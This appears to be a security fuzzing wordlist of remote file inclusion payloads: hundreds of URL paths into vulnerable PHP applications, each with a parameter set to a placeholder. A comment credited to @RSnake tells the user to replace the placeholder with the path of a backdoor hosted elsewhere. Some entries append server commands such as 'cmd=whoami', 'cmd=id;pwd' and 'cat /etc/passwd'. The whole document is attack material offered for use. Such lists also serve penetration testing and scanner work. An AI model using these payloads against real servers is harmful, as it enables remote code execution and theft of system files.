/studip-1.3.0-2/studip-htdocs/archiv_assi.php?cmd=ls%20-al&ABSOLUTE_PATH_STUDIP=XXpathXX?
/studip-1.3.0-2/studip-phplib/oohforms.inc?cmd=ls%20-al&_PHPLIB[libdir]=XXpathXX?
/styles.php?toroot=XXpathXX
/styles/default/global_header.php?installed=23&domain=XXpathXX
/submit_abuse.php?path_prefix=XXpathXX
/submit_comment.php?path_prefix=XXpathXX
/subscp.php?phpbb_root_path=XXpathXX?
/suite/index.php?pg=XXpathXX?
/supasite/admin_auth_cookies.php?supa[db_path]=XXpathXX
/supasite/admin_mods.php?supa[db_path]=XXpathXX
/supasite/admin_news.php?supa[db_path]=XXpathXX
/supasite/admin_settings.php?supa[include_path]=XXpathXX
/supasite/admin_topics.php?supa[db_path]=XXpathXX
/supasite/admin_users.php?supa[db_path]=XXpathXX
/supasite/admin_utilities.php?supa[db_path]=XXpathXX
/supasite/backend_site.php?supa[include_path]=XXpathXX
/supasite/common_functions.php?supa[db_path]=XXpathXX
/supasite/site_comment.php?supa[db_path]=XXpathXX
/supasite/site_news.php?supa[db_path]=XXpathXX
/support/include/open_form.php?include_dir=XXpathXX?cmd=pwd
/support/index.php?main=XXpathXX
/surveys/survey.inc.php?path=XXpathXX
/sw/lib_comment/comment.php?doc_directory=XXpathXX?
/sw/lib_find/find.php?doc_directory=XXpathXX?
/sw/lib_session/session.php?doc_directory=XXpathXX?
/sw/lib_up_file/file.php?doc_directory=XXpathXX?
/sw/lib_up_file/find_file.php?doc_directory=XXpathXX?
/sw/lib_user/find_user.php?doc_directory=XXpathXX?
/sw/lib_user/user.php?doc_directory=XXpathXX?
/sys/code/box.inc.php?config["sipssys"]=XXpathXX
/system/ImageImageMagick.php?glConf[path_system]=XXpathXX?
/system/_b/contentFiles/gBIndex.php?gBRootPath=XXpathXX?
/system/admin/include/item_main.php?GLOBALS=XXpathXX
/system/admin/include/upload_form.php?GLOBALS=XXpathXX
/system/command/admin.cmd.php?GLOBALS=XXpathXX
/system/command/download.cmd.php?GLOBALS=XXpathXX
/system/funcs/xkurl.php?PEARPATH=XXpathXX
/system/includes/pageheaderdefault.inc.php?_sysSessionPath=XXpathXX
/system/login.php?site_path=XXpathXX
/tagit2b/tagmin/delTagUser.php?configpath=XXpathXX?
/tags.php?BBCodeFile=XXpathXX
/taxonservice.php?dir=XXpathXX?
/teatro/pub/pub08_comments.php?basePath=XXpathXX
/technote7/skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=XXpathXX?
/template.php?actionsPage=XXpathXX?
/template.php?blog_theme=XXpathXX
/template.php?pagina=XXpathXX
/template/Noir/index.php?site_path=XXpathXX
/template/Vert/index.php?pageAll=XXpathXX
/template/Vert/index.php?site_path=XXpathXX
/template/barnraiser_01/p_new_password.tpl.php?templatePath=XXpathXX
/template/default/footer.php?ROOT_PATH=XXpathXX?cmd=ls
/template/default/test/header.php?ROOT_PATH=XXpathXX?cmd=ls
/template/gwb/user_bottom.php?config[template_path]=XXpathXX
/template/purpletech/base_include.php?page=XXpathXX?
/template/rwb/user_bottom.php?config[template_path]=XXpathXX
/template_csv.php?rInfo[content]=XXpathXX
/templates/2blue/bodyTemplate.php?serverPath=XXpathXX?
/templates/Official/part_userprofile.php?template_path=XXpathXX
/templates/barrel/template.tpl.php?renderer=XXpathXX
/templates/barrel/template.tpl.php?renderer=XXpathXX?
/templates/barry/template.tpl.php?renderer=XXpathXX
/templates/be2004-2/index.php?mosConfig_absolute_path=XXpathXX
/templates/datumVonDatumBis.inc.php?root=XXpathXX
/templates/default/header.inc.php?menu=XXpathXX
/templates/default/index_logged.php?main_loaded=1&cur_module=XXpathXX
/templates/default/tpl_message.php?right_file=XXpathXX
/templates/footer.inc.php?root=XXpathXX
/templates/header.inc.php?root=XXpathXX
/templates/mylook/template.tpl.php?renderer=XXpathXX
/templates/oerdec/template.tpl.php?renderer=XXpathXX
/templates/pb/language/lang_nl.php?temppath=XXpathXX
/templates/penguin/template.tpl.php?renderer=XXpathXX
/templates/sidebar/template.tpl.php?renderer=XXpathXX
/templates/slashdot/template.tpl.php?renderer=XXpathXX
/templates/stylesheets.php?root=XXpathXX
/templates/text-only/template.tpl.php?renderer=XXpathXX
/templates/tmpl_dfl/scripts/index.php?dir[inc]=XXpathXX
/theme/breadcrumb.php?rootBase=XXpathXX?
/theme/default.php?root=XXpathXX
/theme/format.php?_page_content=XXpathXX?
/theme/format.php?_page_css=XXpathXX?
/theme/frames1.php?root=XXpathXX
/theme/frames1_center.php?root=XXpathXX
/theme/frames1_left.php?root=XXpathXX
/theme/frames1_top.php?root=XXpathXX
/theme/phpAutoVideo/LightTwoOh/sidebar.php?loadpage=XXpathXX
/theme/settings.php?pfad_z=XXpathXX
/theme/test1.php?root=XXpathXX
/theme/test2.php?root=XXpathXX
/theme/test3.php?root=XXpathXX
/theme/test4.php?root=XXpathXX
/theme/test5.php?root=XXpathXX
/theme/test6.php?root=XXpathXX
/themes.php?GLOBALS[theme_path]=XXpathXX?
/themes/blackorange.php?root=XXpathXX
/themes/container.php?theme_directory=XXpathXX%00
/themes/default/layouts/standard.php?page_include=XXpathXX?&act=cmd&cmd=whoami&d=/&submit=1&cmd_txt=1
/themes/default/preview_post_completo.php?dir=XXpathXX
/themes/header.php?theme_directory=XXpathXX%00
/themes/ubb/login.php?theme=XXpathXX
/themes/ubb/login.php?theme=XXpathXX?
/thumbnail.php?module=gallery&GLOBALS[PTH][classes]=XXpathXX
/tikiwiki/tiki-graph_formula.php?w=1&h=1&s=1&min=1&max=2&f[]=x.tan.phpinfo()&t=png&title=XXpathXX
/timedifference.php?la=XXpathXX
/toolbar.loudmouth.php?mainframe=XXpathXX
/tools/update_translations.php?_SESSION[path]=XXpathXX?
/top.php?laypath=XXpathXX
/toplist.php?f=toplist_top10&phpbb_root_path=XXpathXX
/topsites/index.php?page=XXpathXX?&
/towels-0.1/src/scripture.php?pageHeaderFile=XXpathXX
/track.php?path=XXpathXX
/tsep/include/colorswitch.php?tsep_config[absPath]=XXpathXX?
/ttCMS_path/lib/db/ez_sql.php?lib_path=XXpathXX
/twebs/modules/misc/usermods.php?ROOT=XXpathXX
/ubbt.inc.php?GLOBALS[thispath]=XXpathXX?
/unavailable.php?bibtexrootrel=XXpathXX?
/unsubs.php?scdir=XXpathXX
/up.php?my[root]=XXpathXX
/upload.php?save_path=XXpathXX?
/upload/admin/frontpage_right.php?loadadminpage=XXpathXX?
/upload/top.php?maindir=XXpathXX?
/upload/xax/admin/modules/install_module.php?level=XXpathXX?
/upload/xax/admin/patch/index.php?level=XXpathXX?
/upload/xax/ossigeno/admin/install_module.php?level=XXpathXX?
/upload/xax/ossigeno/admin/uninstall_module.php?level=XXpathXX?
/upload_local.php?target=XXpathXX?
/upload_multi.php?target=XXpathXX?
/urlinn_includes/config.php?dir_ws=XXpathXX?
/user.php?caselist[bad_file.txt][path]=XXpathXX&command=cat%20/etc/passwd
/user_language.php?INDM=r3d.w0rm&language_dir=XXpathXX?
/user_new_2.php?home=XXpathXX
/usr/extensions/get_calendar.inc.php?root_path=XXpathXX
/usr/extensions/get_infochannel.inc.php?root_path=XXpathXX?cmd=id;pwd
/usr/extensions/get_tree.inc.php?GLOBALS[root_path]=XXpathXX
/utilitaires/gestion_sondage.php?repertoire_visiteur=XXpathXX
/utils/class_HTTPRetriever.php?libcurlemuinc=XXpathXX
/v-webmail/includes/mailaccess/pop3.php?CONFIG[pear_dir]=XXpathXX
/vCard/admin/define.inc.php?match=XXpathXX?&cmd=id
/vb/includes/functions.php?classfile=XXpathXX
/vb/includes/functions_cron.php?nextitem=XXpathXX
/vb/includes/functions_forumdisplay.php?specialtemplates=XXpathXX
/vbgsitemap/vbgsitemap-config.php?base=XXpathXX
/vbgsitemap/vbgsitemap-vbseo.php?base=XXpathXX
/vedit/editor/edit_htmlarea.php?highlighter=XXpathXX?
/viart_cms-3.3.2/blocks/block_site_map.php?root_folder_path=XXpathXX?
/view.php?ariadne=XXpathXX?
/view.php?id=XXpathXX
/view_func.php?i=XXpathXX&l=testfile.txt?
/views/print/printbar.php?views_path=XXpathXX
/visible_count_inc.php?statitpath=XXpathXX
/visitor.php?_SERVER[DOCUMENT_ROOT]=XXpathXX??
/volume.php?config[public_dir]=XXpathXX?
/vote.php?Madoa=XXpathXX?
/votebox.php?VoteBoxPath=XXpathXX
/vp/configure.php?phpbb_root_path=XXpathXX?
/vwebmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=XXpathXX
/w-agora_path/add_user.php?bn_dir_default=XXpathXX?
/w-agora_path/create_forum.php?bn_dir_default=XXpathXX?
/w-agora_path/create_user.php?bn_dir_default=XXpathXX?
/w-agora_path/delete_notes.php?bn_dir_default=XXpathXX?
/w-agora_path/delete_user.php?bn_dir_default=XXpathXX?
/w-agora_path/edit_forum.php?bn_dir_default=XXpathXX?
/w-agora_path/mail_users.php?bn_dir_default=XXpathXX?
/w-agora_path/moderate_notes.php?bn_dir_default=XXpathXX?
/w-agora_path/reorder_forums.php?bn_dir_default=XXpathXX?
/wamp_dir/setup/yesno.phtml?no_url=XXpathXX?
/wapchat/src/eng.adCreate.php?sysFileDir=XXpathXX
/wapchat/src/eng.adCreateSave.php?sysFileDir=XXpathXX
/wapchat/src/eng.adDispByTypeOptions.php?sysFileDir=XXpathXX
/wapchat/src/eng.createRoom.php?sysFileDir=XXpathXX
/wapchat/src/eng.forward.php?sysFileDir=XXpathXX
/wapchat/src/eng.pageLogout.php?sysFileDir=XXpathXX
/wapchat/src/eng.resultMember.php?sysFileDir=XXpathXX
/wapchat/src/eng.roomDeleteConfirm.php?sysFileDir=XXpathXX
/wapchat/src/eng.saveNewRoom.php?sysFileDir=XXpathXX
/wapchat/src/eng.searchMember.php?sysFileDir=XXpathXX
/wapchat/src/eng.writeMsg.php?sysFileDir=XXpathXX
/war.php?vwar_root=XXpathXX
/warn.php?file=XXpathXX
/watermark.php?GALLERY_BASEDIR=XXpathXX
/wbxml/WBXML/Decoder.php?base_dir=XXpathXX
/wbxml/WBXML/Encoder.php?base_dir=XXpathXX
/web/Administration/Includes/configureText.php?path_prefix=XXpathXX
/web/Administration/Includes/contentHome.php?path_prefix=XXpathXX
/web/Administration/Includes/deleteContent.php?path_prefix=XXpathXX
/web/Administration/Includes/deleteUser.php?path_prefix=XXpathXX
/web/Administration/Includes/userHome.php?path_prefix=XXpathXX
/web/BetaBlockModules//Module/Module.php?path_prefix=XXpathXX
/web/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_pathXXpathXX
/web/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=XXpathXX
/web/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=XXpathXX
/web/BetaBlockModules/EditProfileModule/external.php?path_prefix=XXpathXX
/web/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefixXXpathXX
/web/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_pathXXpathXX
/web/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=XXpathXX
/web/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_pathXXpathXX
/web/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/MyNetworksModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_pathXXpathXX
/web/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_pathXXpathXX
/web/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=XXpathXX
/web/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_pathXXpathXX
/web/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=XXpathXX
/web/Flickrclient.php?path_prefix=XXpathXX
/web/help.php?LIBSDIR=XXpathXX
/web/includes/blogger.php?path_prefix=XXpathXX
/web/includes/functions/auto_email_notify.php?path_prefix=XXpathXX
/web/includes/functions/html_generate.php?path_prefix=XXpathXX
/web/includes/functions/validations.php?path_prefix=XXpathXX
/web/index.php?LIBSDIR=XXpathXX
/web/lib/xml/oai/ListRecords.php?xml_dir=XXpathXX
/web/login.php?LIBSDIR=XXpathXX
/web/logout.php?LIBSDIR=XXpathXX
/web/lom.php?ETCDIR=XXpathXX
/web/network_module_selector.php?path_prefix=XXpathXX
/web/submit_abuse.php?path_prefix=XXpathXX
/web/submit_comment.php?path_prefix=XXpathXX
/webavis/class/class.php?root=XXpathXX?
/webmail/includes/mailaccess/pop3/core.php?CONFIG[pear_dir]=XXpathXX
/webnews/template.php?content_page=XXpathXX?
/webroot/css.php?CONFIGS=XXpathXX
/webyep-system/program/lib/WYURL.php?webyep_sIncludePath=XXpathXX
/webyep-system/programm/webyep.php?webyep_sIncludePath=XXpathXX?
/window.php?action=XXpathXX
/wordpress/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=XXpathXX?
/work/index.php?g_include=XXpathXX
/work/module/forum/forum.php?g_include=XXpathXX
/worldpay_notify.php?mosConfig_absolute_path=XXpathXX
/wp-cache-phase1.php?plugin=XXpathXX
/wp-content/plugins/dm-albums/template/album.php?SECURITY_FILE=XXpathXX
/wp-content/plugins/myflash/myflash-button.php?wpPATH=XXpathXX
/wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=XXpathXX
/wp-content/plugins/wordtube/wordtube-button.php?wpPATH=XXpathXX
/wp-content/plugins/wp-table/js/wptable-button.phpp?wpPATH=XXpathXX?
/wsk/wsk.php?wsk=XXpathXX
/xarg_corner.php?xarg=XXpathXX?
/xarg_corner_bottom.php?xarg=XXpathXX?
/xarg_corner_top.php?xarg=XXpathXX?
/xoopsgallery/init_basic.php?GALLERY_BASEDIR=XXpathXX?&2093085906=1&995617320=2
/xt_counter.php?server_base_dir=XXpathXX
/yabbse/Sources/Packages.php?sourcedir=XXpathXX
/yacs/scripts/update_trailer.php?context[path_to_root]=XXpathXX?
/yrch/plugins/metasearch/plug.inc.php?path=XXpathXX
/ytb/cuenta/cuerpo.php?base_archivo=XXpathXX
/zipndownload.php?PP_PATH=XXpathXX?
/zoomstats/libs/dbmax/mysql.php?GLOBALS['lib']['db']['path']=XXpathXX?
# Compiled by @RSnake (2010-01-02).
# Mostly from milw0rm, osvdb.org and elsewhere.
# Change !INJECT! to the path of your backdoor.
# Note that you may need to try it against every directory on the target and because of how this was culled you may need to add a question mark to your own !INJECT! URL
# E.g.: !INJECT! => http://www.example.com/hax.txt?
/0_admin/modules/Wochenkarte/frontend/index.php?x_admindir=!INJECT!?
/123flashchat.php?e107path=!INJECT!
/2007/administrator/components/com_joomlaflashfun/admin.joomlaflashfun.php?mosConfig_live_site=!INJECT!
/22_ultimate/templates/header.php?mainpath=!INJECT!
/22_ultimate/templates/header.php?mainpath=!INJECT!?
/=!INJECT!
/?_CONFIG[files][functions_page]=!INJECT!
/?npage=-1&content_dir=!INJECT!%00&cmd=ls
/?npage=1&content_dir=!INJECT!%00&cmd=ls
/?show=!INJECT!?
/A-Blog/navigation/donation.php?navigation_start=!INJECT!
/A-Blog/navigation/latestnews.php?navigation_start=!INJECT!?
/A-Blog/navigation/links.php?navigation_start=!INJECT!?
/A-Blog/navigation/search.php?navigation_end=!INJECT!?
/A-Blog/sources/myaccount.php?open_box=!INJECT!?
/ACGVnews/header.php?PathNews=!INJECT!
/ATutor/documentation/common/frame_toc.php?section=!INJECT!
/ATutor/documentation/common/search.php?section=!INJECT!
/ATutor/documentation/common/vitals.inc.php?req_lang=!INJECT!
/ATutor/include/classes/module/module.class.php?row[dir_name]=!INJECT!
/ATutor/include/classes/phpmailer/class.phpmailer.php?lang_path=!INJECT!
/AdaptCMS_Lite_1.4_2/plugins/rss_importer_functions.php?sitepath=!INJECT!?
/Administration/Includes/configureText.php?path_prefix=!INJECT!
/Administration/Includes/contentHome.php?path_prefix=!INJECT!
/Administration/Includes/deleteContent.php?path_prefix=!INJECT!
/Administration/Includes/deleteUser.php?path_prefix=!INJECT!
/Administration/Includes/userHome.php?path_prefix=!INJECT!
/Agora_PATH//mdweb/admin/inc/organisations/country_insert.php?chemin_appli=!INJECT!?
/Agora_PATH//mdweb/admin/inc/organisations/form_org.inc.php?chemin_appli=!INJECT!?
/BE_config.php?_PSL[classdir]=!INJECT!
/BPNEWS/bn_smrep1.php?bnrep=!INJECT!?&
/Base/Application.php?pear_dir=!INJECT!
/Bcwb_PATH/dcontent/default.css.php?root_path_admin=!INJECT!
/Bcwb_PATH/include/startup.inc.php?root_path_admin=!INJECT!
/Bcwb_PATH/system/default.css.php?root_path_admin=!INJECT!
/Beautifier/Core.php?BEAUT_PATH=!INJECT!?
/BetaBlockModules//Module/Module.php?path_prefix=!INJECT!
/BetaBlockModules/AboutUserModule/AboutUserModule.php?path_prefix=!INJECT!
/BetaBlockModules/AddGroupModule/AddGroupModule.php?path_prefix=!INJECT!
/BetaBlockModules/AddMessageModule/AddMessageModule.php?path_prefix=!INJECT!
/BetaBlockModules/AudiosMediaGalleryModule/AudiosMediaGalleryModule.php?current_blockmodule_path=!INJECT!
/BetaBlockModules/CustomizeUIModule/desktop_image.php?path_prefix=!INJECT!
/BetaBlockModules/EditProfileModule/DynamicProfile.php?path_prefix=!INJECT!
/BetaBlockModules/EditProfileModule/external.php?path_prefix=!INJECT!
/BetaBlockModules/EnableModule/EnableModule.php?path_prefix=!INJECT!
/BetaBlockModules/ExternalFeedModule/ExternalFeedModule.php?path_prefix=!INJECT!
/BetaBlockModules/FlickrModule/FlickrModule.php?path_prefix=!INJECT!
/BetaBlockModules/GroupForumModule/GroupForumModule.php?path_prefix=!INJECT!
/BetaBlockModules/GroupForumPermalinkModule/GroupForumPermalinkModule.php?path_prefix=!INJECT!
/BetaBlockModules/GroupModerateContentModule/GroupModerateContentModule.php?path_prefix=!INJECT!
/BetaBlockModules/GroupModerateUserModule/GroupModerateUserModule.php?path_prefix=!INJECT!
/BetaBlockModules/GroupModerationModule/GroupModerationModule.php?path_prefix=!INJECT!
/BetaBlockModules/GroupsCategoryModule/GroupsCategoryModule.php?path_prefix=!INJECT!
/BetaBlockModules/GroupsDirectoryModule/GroupsDirectoryModule.php?path_prefix=!INJECT!
/BetaBlockModules/ImagesMediaGalleryModule/ImagesMediaGalleryModule.php?current_blockmodule_path=!INJECT!
/BetaBlockModules/ImagesModule/ImagesModule.php?path_prefix=!INJECT!
/BetaBlockModules/InvitationStatusModule/InvitationStatusModule.php?path_prefix=!INJECT!
/BetaBlockModules/LargestGroupsModule/LargestGroupsModule.php?path_prefix=!INJECT!
/BetaBlockModules/LinksModule/LinksModule.php?path_prefix=!INJECT!
/BetaBlockModules/LoginModule/remoteauth_functions.php?path_prefix=!INJECT!
/BetaBlockModules/LogoModule/LogoModule.php?path_prefix=!INJECT!
/BetaBlockModules/MediaFullViewModule/MediaFullViewModule.php?path_prefix=!INJECT!
/BetaBlockModules/MediaManagementModule/MediaManagementModule.php?path_prefix=!INJECT!
/BetaBlockModules/MembersFacewallModule/MembersFacewallModule.php?current_blockmodule_path=!INJECT!
/BetaBlockModules/MessageModule/MessageModule.php?path_prefix=!INJECT!
/BetaBlockModules/ModuleSelectorModule/ModuleSelectorModule.php?path_prefix=!INJECT!
/BetaBlockModules/MyGroupsModule/MyGroupsModule.php?path_prefix=!INJECT!
/BetaBlockModules/MyLinksModule/MyLinksModule.php?path_prefix=!INJECT!
/BetaBlockModules/MyNetworksModule.php?path_prefix=!INJECT!
/BetaBlockModules/NetworkAnnouncementModule/NetworkAnnouncementModule.php?path_prefix=!INJECT!
/BetaBlockModules/NetworkDefaultControlModule/NetworkDefaultControlModule.php?path_prefix=!INJECT!
/BetaBlockModules/NetworkDefaultLinksModule/NetworkDefaultLinksModule.php?path_prefix=!INJECT!
/BetaBlockModules/NetworkModerateUserModule/NetworkModerateUserModule.php?path_prefix=!INJECT!
/BetaBlockModules/NetworkResultContentModule/NetworkResultContentModule.php?path_prefix=!INJECT!
/BetaBlockModules/NetworkResultUserModule/NetworkResultUserModule.php?path_prefix=!INJECT!
/BetaBlockModules/NetworksDirectoryModule/NetworksDirectoryModule.php?path_prefix=!INJECT!
/BetaBlockModules/NewestGroupsModule/NewestGroupsModule.php?current_blockmodule_path=!INJECT!
/BetaBlockModules/PeopleModule/PeopleModule.php?path_prefix=!INJECT!
/BetaBlockModules/PopularTagsModule/PopularTagsModule.php?path_prefix=!INJECT!
/BetaBlockModules/PostContentModule/PostContentModule.php?path_prefix=!INJECT!
/BetaBlockModules/ProfileFeedModule/ProfileFeedModule.php?path_prefix=!INJECT!
/BetaBlockModules/RecentCommentsModule/RecentCommentsModule.php?path_prefix=!INJECT!
/BetaBlockModules/RecentPostModule/RecentPostModule.php?path_prefix=!INJECT!
/BetaBlockModules/RecentTagsModule/RecentTagsModule.php?path_prefix=!INJECT!
/BetaBlockModules/RegisterModule/RegisterModule.php?path_prefix=!INJECT!
/BetaBlockModules/SearchGroupsModule/SearchGroupsModule.php?path_prefix=!INJECT!
/BetaBlockModules/ShowAnnouncementModule/ShowAnnouncementModule.php?path_prefix=!INJECT!
/BetaBlockModules/ShowContentModule/ShowContentModule.php?path_prefix=!INJECT!
/BetaBlockModules/TakerATourModule/TakerATourModule.php?path_prefix=!INJECT!
/BetaBlockModules/UploadMediaModule/UploadMediaModule.php?current_blockmodule_path=!INJECT!
/BetaBlockModules/UserMessagesModule/UserMessagesModule.php?path_prefix=!INJECT!
/BetaBlockModules/UserPhotoModule/UserPhotoModule.php?path_prefix=!INJECT!
/BetaBlockModules/VideosMediaGalleryModule/VideosMediaGalleryModule.php?current_blockmodule_path=!INJECT!
/BetaBlockModules/ViewAllMembersModule/ViewAllMembersModule.php?path_prefix=!INJECT!
/Blog_CMS/admin/plugins/NP_UserSharing.php?DIR_ADMIN=!INJECT!?admin
/BsiliX_path]/files/mbox-action.php3?BSX_LIBDIR=!INJECT!
/CSLH2_path/txt-db-api/util.php?API_HOME_DIR=!INJECT!?
/CheckUpload.php?Language=!INJECT!&cmd=ls
/Contenido_4.8.4/contenido/backend_search.php?contenido_path=!INJECT!?
/Contenido_4.8.4/contenido/cronjobs/move_articles.php?cfg[path][contenido]=!INJECT!?
/Contenido_4.8.4/contenido/cronjobs/move_old_stats.php?cfg[path][contenido]=!INJECT!?
/Contenido_4.8.4/contenido/cronjobs/optimize_database.php?cfg[path][contenido]=!INJECT!?
/Contenido_4.8.4/contenido/cronjobs/run_newsletter_job.php?cfg[path][contenido]=!INJECT!?
/Contenido_4.8.4/contenido/cronjobs/send_reminder.php?cfg[path][contenido]=!INJECT!?
/Contenido_4.8.4/contenido/cronjobs/session_cleanup.php?cfg[path][contenido]=!INJECT!?
/Contenido_4.8.4/contenido/cronjobs/setfrontenduserstate.php?cfg[path][contenido]=!INJECT!?
/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][contenido]=!INJECT!?
/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[path][templates]=!INJECT!?
/Contenido_4.8.4/contenido/includes/include.newsletter_jobs_subnav.php?cfg[templates][right_top_blank]=!INJECT!?
/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][contenido]=!INJECT!?
/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[path][templates]=!INJECT!?
/Contenido_4.8.4/contenido/plugins/content_allocation/includes/include.right_top.php?cfg[templates][right_top_blank]=!INJECT!?
/CoupleDB.php?Parametre=0&DataDirectory=!INJECT!?
/DFF_PHP_FrameworkAPI-latest/include/DFF_affiliate_client_API.php?DFF_config[dir_include]=!INJECT!
/DFF_PHP_FrameworkAPI-latest/include/DFF_featured_prdt.func.php?DFF_config[dir_include]=!INJECT!
/DFF_PHP_FrameworkAPI-latest/include/DFF_mer.func.php?DFF_config[dir_include]=!INJECT!
/DFF_PHP_FrameworkAPI-latest/include/DFF_mer_prdt.func.php?DFF_config[dir_include]=!INJECT!
/DFF_PHP_FrameworkAPI-latest/include/DFF_paging.func.php?DFF_config[dir_include]=!INJECT!
/DFF_PHP_FrameworkAPI-latest/include/DFF_rss.func.php?DFF_config[dir_include]=!INJECT!
/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]=!INJECT!
/DFF_PHP_FrameworkAPI-latest/include/DFF_sku.func.php?DFF_config[dir_include]!INJECT!
/DON3/applications/don3_requiem.don3app/don3_requiem.php?app_path=!INJECT!
/DON3/applications/frontpage.don3app/frontpage.php?app_path=!INJECT!?
/Dir_phNNTP/article-raw.php?file_newsportal=!INJECT!?
/DynaTracker_v151/action.php?base_path=!INJECT!
/DynaTracker_v151/includes_handler.php?base_path=!INJECT!
/Easysite-2.0_path/configuration/browser.php?EASYSITE_BASE=!INJECT!?
/Ex/modules/threadstop/threadstop.php?exbb[home_path]=!INJECT!?
/Ex/modules/threadstop/threadstop.php?new_exbb[home_path]=!INJECT!?
/Exophpdesk_PATH/pipe.php?lang_file=!INJECT!
/FirstPost/block.php?Include=!INJECT!
/Flickrclient.php?path_prefix=!INJECT!
/FormTools1_5_0/global/templates/admin_page_open.php?g_root_dir=!INJECT!?
/FormTools1_5_0/global/templates/client_page_open.php?g_root_dir=!INJECT!?
/Full_Release/include/body_comm.inc.php?content=!INJECT!
/Gallery/displayCategory.php?basepath=!INJECT!
/Include/lib.inc.php3?Include=!INJECT!?
/Include/variables.php3?Include=!INJECT!?
/Jobline/admin.jobline.php?mosConfig_absolute_path=!INJECT!
/ListRecords.php?lib_dir=!INJECT!?&cmd=id
/Lorev1/third_party/phpmailer/class.phpmailer.php?lang_path=!INJECT!
/MOD_forum_fields_parse.php?phpbb_root_path=!INJECT!
